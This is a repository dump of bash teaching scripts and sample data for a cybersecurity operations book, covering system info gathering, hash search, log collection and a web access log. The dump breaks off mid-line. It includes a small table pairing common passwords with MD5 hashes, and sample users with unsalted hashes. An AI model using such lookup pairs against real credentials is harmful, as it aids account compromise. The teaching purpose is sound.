Repository: cybersecurityops/cyber-ops-with-bash Branch: master Commit: 84ccf91092e1 Files: 71 Total size: 123.7 KB Directory structure: gitextract_c6os0si7/ ├── LICENSE ├── ch03/ │ ├── echoparams.sh │ └── osdetect.sh ├── ch04/ │ └── frost.txt ├── ch05/ │ ├── cmds.txt │ ├── cutfile.txt │ ├── getlocal.sh │ ├── hashsearch.sh │ ├── typesearch.sh │ └── winlogs.sh ├── ch06/ │ ├── accesstime.txt │ ├── awkusers.txt │ ├── book.json │ ├── book.xml │ ├── csvex.txt │ ├── ips.txt │ ├── passwords.txt │ ├── procowner.txt │ ├── tasks.txt │ ├── user.txt │ └── usernames.txt ├── ch07/ │ ├── access.log │ ├── countem.awk │ ├── countem.sh │ ├── histogram.sh │ ├── histogram_plain.sh │ ├── pagereq.awk │ ├── pagereq.sh │ ├── summer.sh │ ├── useragents.sh │ └── useragents.txt ├── ch08/ │ ├── livebar.sh │ ├── looper.sh │ ├── tailcount.sh │ └── wintail.sh ├── ch09/ │ ├── autoscan.sh │ ├── fd2.sh │ └── scan.sh ├── ch10/ │ └── baseline.sh ├── ch11/ │ ├── Calc_VT.txt │ ├── WannaCry_VT.txt │ ├── helloworld.c │ ├── vtjson.awk │ └── vtjson.sh ├── ch12/ │ ├── tagit.sh │ ├── webdash.sh │ └── weblogfmt.sh ├── ch13/ │ ├── bannergrabber.sh │ └── smtpconnect.sh ├── ch14/ │ ├── askey.sh │ ├── innerscript.sh │ ├── logfuscate.sh │ ├── oneline.sh │ ├── readable.sh │ ├── streamcipher.sh │ ├── synfuscate.sh │ └── wrapper.sh ├── ch15/ │ ├── fuzzer.sh │ └── fuzzme.c ├── ch16/ │ ├── LocalRat.sh │ └── RemoteRat.sh ├── ch19/ │ └── pingmonitor.sh ├── ch20/ │ └── softinv.sh ├── ch21/ │ ├── test.input │ └── validateconfig.sh ├── ch22/ │ ├── checkemail.1liner │ ├── checkemail.sh │ ├── checkemailAlt.sh │ ├── checkpass.sh │ └── emailbatch.sh └── readme.txt ================================================ FILE CONTENTS ================================================ ================================================ FILE: LICENSE ================================================ MIT License Copyright (c) 2019 Cybersecurity Ops with bash Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ================================================ FILE: ch03/echoparams.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # echoparams.sh # # Description: # Demonstrates accessing parameters in bash # # Usage: # ./echoparms.sh # echo $# echo $0 echo $1 echo $2 echo $3 ================================================ FILE: ch03/osdetect.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # osdetect.sh # # Description: # Distinguish between MS-Windows/Linux/MacOS # # Usage: bash osdetect.sh # output will be one of: Linux MSWin macOS # if type -t wevtutil &> /dev/null # <1> then OS=MSWin elif type -t scutil &> /dev/null # <2> then OS=macOS else OS=Linux fi echo $OS ================================================ FILE: ch04/frost.txt ================================================ 1 Two roads diverged in a yellow wood, 2 And sorry I could not travel both 3 And be one traveler, long I stood 4 And looked down one as far as I could 5 To where it bent in the undergrowth; 6 7 Excerpt from The Road Not Taken by Robert Frost ================================================ FILE: ch05/cmds.txt ================================================ #Linux Command |MSWin Bash |XML tag |Purpose #----------------+------------+-----------+------------------------------ uname -a |uname -a |uname |O.S. version etc cat /proc/cpuinfo|systeminfo |sysinfo |system hardware and related info ifconfig |ipconfig |nwinterface|Network interface information ip route |route print |nwroute |routing table arp -a |arp -a |nwarp |ARP table netstat -a |netstat -a |netstat |network connections mount |net share |diskinfo |mounted disks ps -e |tasklist |processes |running processes ================================================ FILE: ch05/cutfile.txt ================================================ 12/05/2017 192.168.10.14 test.html 12/30/2017 192.168.10.185 login.html ================================================ FILE: ch05/getlocal.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # getlocal.sh # # Description: # Gathers general system information and dumps it to a file # # Usage: # bash getlocal.sh < cmds.txt # cmds.txt is a file with list of commands to run # # SepCmds - separate the commands from the line of input function SepCmds() { LCMD=${ALINE%%|*} # <11> REST=${ALINE#*|} # <12> WCMD=${REST%%|*} # <13> REST=${REST#*|} TAG=${REST%%|*} # <14> if [[ $OSTYPE == "MSWin" ]] then CMD="$WCMD" else CMD="$LCMD" fi } function DumpInfo () { # <5> printf '\n' "$(date '+%F')" "$(date '+%T')" readarray CMDS # <6> for ALINE in "${CMDS[@]}" # <7> do # ignore comments if [[ ${ALINE:0:1} == '#' ]] ; then continue ; fi # <8> SepCmds if [[ ${CMD:0:3} == N/A ]] # <9> then continue else printf "<%s>\n" $TAG # <10> $CMD printf "\n" $TAG fi done printf "\n" } OSTYPE=$(./osdetect.sh) # <1> HOSTNM=$(hostname) # <2> TMPFILE="${HOSTNM}.info" # <3> # gather the info into the tmp file; errors, too DumpInfo > $TMPFILE 2>&1 # <4> ================================================ FILE: ch05/hashsearch.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # hashsearch.sh # # Description: # Recursively search a given directory for a file that # matches a given SHA-1 hash # # Usage: # hashsearch.sh # hash - SHA-1 hash value to file to find # directory - Top directory to start search # HASH=$1 DIR=${2:-.} # default is here, cwd # convert pathname into an absolute path function mkabspath () # <6> { if [[ $1 == /* ]] # <7> then ABS=$1 else ABS="$PWD/$1" # <8> fi } find $DIR -type f | # <1> while read fn do THISONE=$(sha1sum "$fn") # <2> THISONE=${THISONE%% *} # <3> if [[ $THISONE == $HASH ]] then mkabspath "$fn" # <4> echo $ABS # <5> fi done ================================================ FILE: ch05/typesearch.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # typesearch.sh # # Description: # Search the file system for a given file type. It prints out the # pathname when found. # # Usage: # typesearch.sh [-c dir] [-i] [-R|r] # -c Copy files found to dir # -i Ignore case # -R|r Recursively search subdirectories # File type pattern to search for # Path to start search # DEEPORNOT="-maxdepth 1" # just the current dir; default # PARSE option arguments: while getopts 'c:irR' opt; do # <1> case "${opt}" in # <2> c) # copy found files to specified directory COPY=YES DESTDIR="$OPTARG" # <3> ;; i) # ignore u/l case differences in search CASEMATCH='-i' ;; [Rr]) # recursive # <4> unset DEEPORNOT;; # <5> *) # unknown/unsupported option # <6> # error mesg will come from getopts, so just exit exit 2 ;; esac done shift $((OPTIND - 1)) # <7> PATTERN=${1:-PDF document} # <8> STARTDIR=${2:-.} # by default start here find $STARTDIR $DEEPORNOT -type f | while read FN # <9> do file $FN | egrep -q $CASEMATCH "$PATTERN" # <10> if (( $? == 0 )) # found one # <11> then echo $FN if [[ $COPY ]] # <12> then cp -p $FN $DESTDIR # <13> fi fi done ================================================ FILE: ch05/winlogs.sh ================================================ #!/bin/bash - # # Cybersecurity Ops with bash # winlogs.sh # # Description: # Gather copies of Windows log files # # Usage: # winlogs.sh [-z] [dir] # -z Tar and zip the output # dir Optional scratch directory for holding the log files TGZ=0 if (( $# > 0 )) # <1> then if [[ ${1:0:2} == '-z' ]] # <2> then TGZ=1 # tgz flag to tar/zip the log files shift fi fi SYSNAM=$(hostname) LOGDIR=${1:-/tmp/${SYSNAM}_logs} # <3> mkdir -p $LOGDIR # <4> cd ${LOGDIR} || exit -2 wevtutil el | while read ALOG # <5> do ALOG="${ALOG%$'\r'}" # <6> echo "${ALOG}:" # <7> SAFNAM="${ALOG// /_}" # <8> SAFNAM="${SAFNAM//\//-}" wevtutil epl "$ALOG" "${SYSNAM}_${SAFNAM}.evtx" done if (( TGZ == 1 )) # <9> then tar -czvf ${SYSNAM}_logs.tgz *.evtx # <10> fi ================================================ FILE: ch06/accesstime.txt ================================================ 0745,file1.txt,1 0830,file4.txt,2 0830,file5.txt,3 ================================================ FILE: ch06/awkusers.txt ================================================ Mike Jones John Smith Kathy Jones Jane Kennedy Tim Scott ================================================ FILE: ch06/book.json ================================================ { <1> "title": "Cybersecurity Ops with bash", <2> "edition": 1, "authors": [ <3> { "firstName": "Paul", "lastName": "Troncone" }, { "firstName": "Carl", "lastName": "Albing" } ] } ================================================ FILE: ch06/book.xml ================================================ <1> <2> Paul <3> Troncone <4> Carl Albing ================================================ FILE: ch06/csvex.txt ================================================ "name","username","phone","password hash" "John Smith","jsmith","555-555-1212",5f4dcc3b5aa765d61d8327deb882cf99 "Jane Smith","jnsmith","555-555-1234",e10adc3949ba59abbe56e057f20f883e "Bill Jones","bjones","555-555-6789",d8578edf8458ce06fbc5bb76a58c5ca4 ================================================ FILE: ch06/ips.txt ================================================ ip,OS 10.0.4.2,Windows 8 10.0.4.35,Ubuntu 16 10.0.4.107,macOS 10.0.4.145,macOS ================================================ FILE: ch06/passwords.txt ================================================ password,md5hash 123456,e10adc3949ba59abbe56e057f20f883e password,5f4dcc3b5aa765d61d8327deb882cf99 welcome,40be4e59b9a2a2b5dffb918c0e86b3d7 ninja,3899dcbab79f92af727c2190bbd8abc5 abc123,e99a18c428cb38d5f260853678922e03 123456789,25f9e794323b453885f5181f1b624d0b 12345678,25d55ad283aa400af464c76d713c07ad sunshine,0571749e2ac330a7455809c6b0e7af90 princess,8afa847f50a716e64932d995c8e7435a qwerty,d8578edf8458ce06fbc5bb76a58c5c ================================================ FILE: ch06/procowner.txt ================================================ Process Owner;PID jdoe;0 tjones;4 jsmith;340 msmith;528 ================================================ FILE: ch06/tasks.txt ================================================ Image Name;PID;Session Name;Session#;Mem Usage System Idle Process;0;Services;0;4 K System;4;Services;0;2,140 K smss.exe;340;Services;0;1,060 K csrss.exe;528;Services;0;4,756 K ================================================ FILE: ch06/user.txt ================================================ user,ip jdoe,10.0.4.2 jsmith,10.0.4.35 msmith,10.0.4.107 tjones,10.0.4.145 ================================================ FILE: ch06/usernames.txt ================================================ 1,jdoe 2,puser 3,jsmith ================================================ FILE: ch07/access.log ================================================ 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /fade.gif HTTP/1.1" 200 1112 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /index.html HTTP/1.1" 200 6933 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /favicon.ico HTTP/1.1" 404 504 "-" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3413 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1429 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:52:59 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19526 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42818 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:00 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47030 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /about.html HTTP/1.1" 200 7042 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /uploads/2/9/1/4/29147191/page-layouts-4078890_orig.jpg HTTP/1.1" 200 265418 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:53:11 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/GW-bridge.html HTTP/1.1" 200 5011 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /consulting.html HTTP/1.1" 200 7269 "http://192.168.0.35/about.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /uploads/2/9/1/4/29147191/398980_orig.png HTTP/1.1" 200 120188 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:54:10 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:54:11 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /favicon.ico HTTP/1.1" 404 503 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /index.html HTTP/1.1" 200 6932 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19444 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/941880.png HTTP/1.1" 200 7835 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/31549414299.png?457 HTTP/1.1" 200 81377 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2670902_orig.jpg HTTP/1.1" 200 19525 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2992005_orig.jpg HTTP/1.1" 200 47029 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:26 -0500] "GET /uploads/2/9/1/4/29147191/2267842_orig.jpg HTTP/1.1" 200 42819 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] "GET /support.html HTTP/1.1" 200 6207 "http://192.168.0.35/index.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:30 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:31 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /request-quote.html HTTP/1.1" 200 7326 "http://192.168.0.35/support.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Colaboration.html HTTP/1.1" 200 5011 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:54:39 -0500] "GET /files/theme/images/select-arrowaf0e.png?1509483497 HTTP/1.1" 200 1386 "http://192.168.0.35/files/main_styleaf0e.css?1509483497" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /products.html HTTP/1.1" 200 7158 "http://192.168.0.35/consulting.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/253922682aa.png?162 HTTP/1.1" 200 16602 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/99480889766.png?165 HTTP/1.1" 200 26428 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /uploads/2/9/1/4/29147191/32981bd4c.png?161 HTTP/1.1" 200 38062 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/mobile49c2.js?1490908488 HTTP/1.1" 200 3414 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/custom49c2.js?1490908488 HTTP/1.1" 200 1430 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:56:52 -0500] "GET /files/theme/plugin49c2.js?1490908488 HTTP/1.1" 200 19445 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.37 - - [12/Nov/2017:15:56:53 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Working2.html HTTP/1.1" 200 5011 "http://192.168.0.35/products.html" "Mozilla/5.0 (Windows NT 5.1; rv:43.0) Gecko/20100101 Firefox/43.0" 192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /resources.html HTTP/1.1" 200 7569 "http://192.168.0.35/request-quote.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/identity_orig.png HTTP/1.1" 200 47804 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/editor/078519-blue-jelly-icon-business-envelope5ca13.png?1492225862 HTTP/1.1" 200 7769 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/428026.png HTTP/1.1" 200 20174 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/principlesofcyber_orig.png HTTP/1.1" 200 43725 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /uploads/2/9/1/4/29147191/principlesofencryption-nb_orig.png HTTP/1.1" 200 45954 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:57:10 -0500] "GET /_/cdn2.editmysite.com/images/editor/theme-background/stock/Work-Outside.html HTTP/1.1" 200 5011 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.11 - - [12/Nov/2017:15:57:15 -0500] "GET /uploads/2/9/1/4/29147191/protecting_your_identity.pdf HTTP/1.1" 200 775340 "http://192.168.0.35/resources.html" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0" 192.168.0.26 - - [12/Nov/2017:16:16:01 -0500] "GET / HTTP/1.1" 200 2377 "-" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /backblue.gif HTTP/1.1" 200 4529 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /fade.gif HTTP/1.1" 200 1113 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /index.html HTTP/1.1" 200 6932 "http://192.168.0.35/" "Mozilla/5.0 (iPad; CPU OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1" 192.168.0.26 - - [12/Nov/2017:16:16:02 -0500] "GET /files/main_styleaf0e.css?1509483497 HTTP/1.1" 200 5022 